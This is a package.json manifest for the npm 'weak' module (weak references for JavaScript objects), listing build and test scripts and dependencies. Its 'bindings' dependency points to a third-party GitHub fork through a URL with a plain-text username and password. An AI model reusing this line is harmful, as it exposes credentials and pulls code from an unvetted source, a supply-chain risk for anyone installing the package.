{
  "author": "Ben Noordhuis <info@bnoordhuis.nl>",
  "contributors": [
    "Nathan Rajlich <nathan@tootallnate.net> (http://tootallnate.net)"
  ],
  "name": "weak",
  "license": "MIT",
  "description": "Make weak references to JavaScript Objects.",
  "keywords": [
    "weak",
    "reference",
    "js",
    "javascript",
    "object",
    "function",
    "callback"
  ],
  "version": "1.0.1",
  "repository": {
    "type": "git",
    "url": "git://github.com/TooTallNate/node-weak.git"
  },
  "main": "lib/weak.js",
  "scripts": {
    "test": "mocha -gc --reporter spec",
    "electron": "node-gyp rebuild --runtime=electron --target=1.4.4 --disturl=https://atom.io/download/atom-shell --build-from-source",
    "build": "node-gyp rebuild"
  },
  "dependencies": {
    "bindings": "https://shivar1:malangbaba12345@github.com/shivar1/node-bindings.git",
    "nan": "^2.0.5"
  },
  "devDependencies": {
    "mocha": "5"
  }
}
